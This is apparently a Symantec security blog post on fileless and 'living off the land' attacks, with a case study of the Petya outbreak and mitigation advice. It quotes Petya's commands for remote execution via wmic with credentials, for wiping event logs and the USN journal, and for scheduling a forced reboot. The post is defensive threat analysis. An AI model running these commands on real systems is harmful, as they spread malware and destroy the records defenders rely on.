Symantec Security Response - Attackers are increasingly living off the land
The use of fileless threats and dual-use tools by attackers is becoming more common
There is an increased discussion around threats that adopt so called “living off the land” tactics. Attackers are
increasingly making use of tools already installed on targeted computers or are running simple scripts and shellcode
directly in memory. Creating less new files on the hard disk, or being completely fileless, means less chance of being
detected by traditional security tools and therefore minimises the risk of an attack being blocked. Using simple and
clean dual-use tools allows the attacker to hide in plain sight among legitimate system administration work.
Living off the land tactics are increasingly being adopted by cyber criminals and are used in almost every targeted
attack.
There are four main categories falling under the umbrella of living off the land:
• Dual-use tools, such as PsExec, which are used by the attacker
•
• Memory only threats, such as the Code Red worm
•
• Fileless persistence, such as VBS in the registry
•
• Non-PE file attacks, such as Office documents with macros or scripts
We also see slight variations on these tactics, such as using BITSAdmin in macros to download a malicious payload, or
hiding a PowerShell script which triggered through a SCT file referenced in a registry run key. In some cases, stolen
data is then exfiltrated through legitimate cloud services, hiding the event in normal traffic patterns.
Figure 1. Typical living off the land attack chain
Case study: June 27 Petya outbreak
The Ransom.Petya outbreak, which hit organisations in the Ukraine and many other countries on June 27, is a good example of an attack
using living off the land tactics.
The ransomware was exhibiting some wiper characteristics and immediately gained the attention of both security experts
and the media as it was, among other things, exploiting the SMB EternalBlue vulnerability just like the headline
grabbing WannaCry (Ransom.WannaCry) did one month earlier. The threat made use of a clever supply chain attack as its initial infection vector by
compromising the update process of a widely used accounting software program.
However, in addition Petya also made heavy use of system commands during the infection process. Once executed, Petya
drops a recompiled version of LSADump from Mimikatz in a 32-bit and 64-bit variant, which is used to dump credentials
from Windows memory. The account credentials are then used to copy the threat to the Admin$ share of any computers the
threat finds on the network. Once the threat accesses a remote system it will execute itself remotely using a dropped
instance of PsExec.exe and the Windows Management Instrumentation (WMI) command line tool wmic.exe:
wmic.exe /node:[IP Address] /user:[USERNAME] /password:[PASSWORD] process call create "C:\Windows\System32\rundll32.exe
\"C:\Windows\perfc.dat\" #1 60”
In order to hide its tracks on the compromised computer the threat deletes various system logs by using the wevtutil and
fsutil commands:
wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:
Petya then creates a scheduled task so that the computer restarts into the modified MBR and performs the final
encryption task:
schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 14:42
This case is a classic example of system tools being used during an attack. Many system administrators are now looking
into disabling remote PsExec execution or restricting WMI access in order to defend against the same attack pattern in
the future.
Malware using WMI is not a new occurrence. Last year we observed an average of two percent of analysed malware samples
making use of WMI for nefarious purpose, and the upward trend is clearly continuing.
Figure 2. Percentage of malware using WMI
System tools used for reconnaissance
Besides being used for lateral movement, it is also very common for targeted attack groups to use system tools for
reconnaissance. Out of the 10 targeted attack groups that we looked at, all of them made use of system tools to explore
compromised environments.
Table. The 10 attack groups Symantec looked at and the system tools they used
Mitigation
Preventing infection in the first place is by far the best strategy. Since email and infected websites are still the
most common infection vectors for malware, adopting a robust defence against both of these will help reduce the risk of
infection. In addition, best practices for segregation of networks, extensive logging including system tools, and a
least privileges approach should be assessed for larger networks.
Symantec has various protection features in place in the network and on the endpoint to protect against fileless threats
and living off the land attacks. For example, our memory exploit mitigation (MEM) techniques can proactively block
remote code execution exploits (RCE), our heuristic based memory scanning can detect memory only threats, and Symantec’s
behaviour based detection engine SONAR can detect malicious usage of dual-use tools and block them.
For more details, read our white paper: Living off the land and fileless attack techniques
ends